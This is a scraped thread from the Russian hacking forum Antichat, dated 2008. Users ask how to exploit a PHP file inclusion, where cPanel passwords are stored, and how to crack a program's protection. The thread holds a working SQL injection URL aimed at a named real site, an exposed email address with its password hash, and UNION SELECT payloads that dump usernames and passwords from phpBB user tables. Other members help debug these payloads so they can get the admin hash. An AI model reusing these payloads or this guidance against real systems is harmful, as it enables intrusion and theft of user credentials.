ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2551  
Старый 06.07.2008, 22:29
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

вопрос такой нашел пхп инклуд на сайте одном...вроде читаю пару файлов на сервере, но так как я в этом деле новичок хотелось бы узнать последствие моих действий, и ещё где хранятся пассы от Cpanel
 
Ответить с цитированием

Прогрмма
  #2552  
Старый 06.07.2008, 23:17
shikin
Новичок
Регистрация: 04.07.2008
Сообщений: 1
Провел на форуме:
4205

Репутация: 0
Smile Прогрмма

Подскажите пожалуйста куда обратится с вопросом по изличению программ от "жадности"?.
Надо помощь ваша в снятии защиты, распаковке, а потом взломе Des.
 
Ответить с цитированием

  #2553  
Старый 08.07.2008, 01:09
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Вопрос такой,это че за тип хэша?
Код:
nores2005@yandex.ru:205abdfcc23287dea72cb534b5eee922561557ff4d04ed102e5a3ff8884216421f0e3dad99908345f7439f8ffabdffc4
ЫЫЫ,хэш без пробелов конечно

_http://www.menunsk.ru/places.php?id=0)+union+select+concat_ws(0x3a,mail, hesh),2+from+menunsk_mail+where+id=0x31/*
 
Ответить с цитированием

  #2554  
Старый 08.07.2008, 01:25
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

DDoSька
Скорее всего SHA384
 
Ответить с цитированием

  #2555  
Старый 08.07.2008, 06:35
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

2+union+select+1,concat_ws(0x3a,username,user_pass word),3+from+phpbb_users/*
error на username

2+union+select+1,concat_ws(0x3a,0x757365726e616d65 ,user_password),3+from+phpbb_users/*
Пропускает но все логины меняются на username.

??? не хватает прав на прасмотор столбца username ???
 
Ответить с цитированием

  #2556  
Старый 08.07.2008, 07:54
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
По умолчанию

Цитата:
Сообщение от tor4)  
2+union+select+1,concat_ws(0x3a,username,user_pass word),3+from+phpbb_users/*
error на username

2+union+select+1,concat_ws(0x3a,0x757365726e616d65 ,user_password),3+from+phpbb_users/*
Пропускает но все логины меняются на username.

??? не хватает прав на прасмотор столбца username ???
`username` - а так?
 
Ответить с цитированием

  #2557  
Старый 08.07.2008, 09:43
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от tor4)  
Пропускает но все логины меняются на username
Что это значит?
Ты выводишь 2 столбца username и user_password,они выводятся. Что тебе не нравится?
Какие логины? Вот таблицы по дефолту в PhpBB 2 phpbb_users:
username
user_password
user_email
user_icq
user_aim
 
Ответить с цитированием

  #2558  
Старый 08.07.2008, 09:59
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918

Репутация: 56
Отправить сообщение для z3r0cool с помощью ICQ
По умолчанию

Цитата:
Сообщение от jokester  
Что это значит?
просто tor4) закатал username в хекс, что собственно эквивалентно SELECT 'username' , поэтому вместо содержимого столбца username, выводится строка 'username'
 
Ответить с цитированием

  #2559  
Старый 08.07.2008, 10:18
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от z3r0cool  
просто tor4) закатал username в хекс, что собственно эквивалентно SELECT 'username' , поэтому вместо содержимого столбца username, выводится строка 'username'
Ааааа ,блин , я вопрос не сразу понял
2 tor4)
Врятли на столбец нет прав доступа, давай линк, посмотрим
 
Ответить с цитированием

  #2560  
Старый 08.07.2008, 11:36
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

2 tor4)
Скорее всего дефолтное имя столбца изменено, а вообще, нах тебе username ? Тебе же скорее всего админский хэш нужен, а он самый первый в таблице.
Кста, какой error выпадает ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ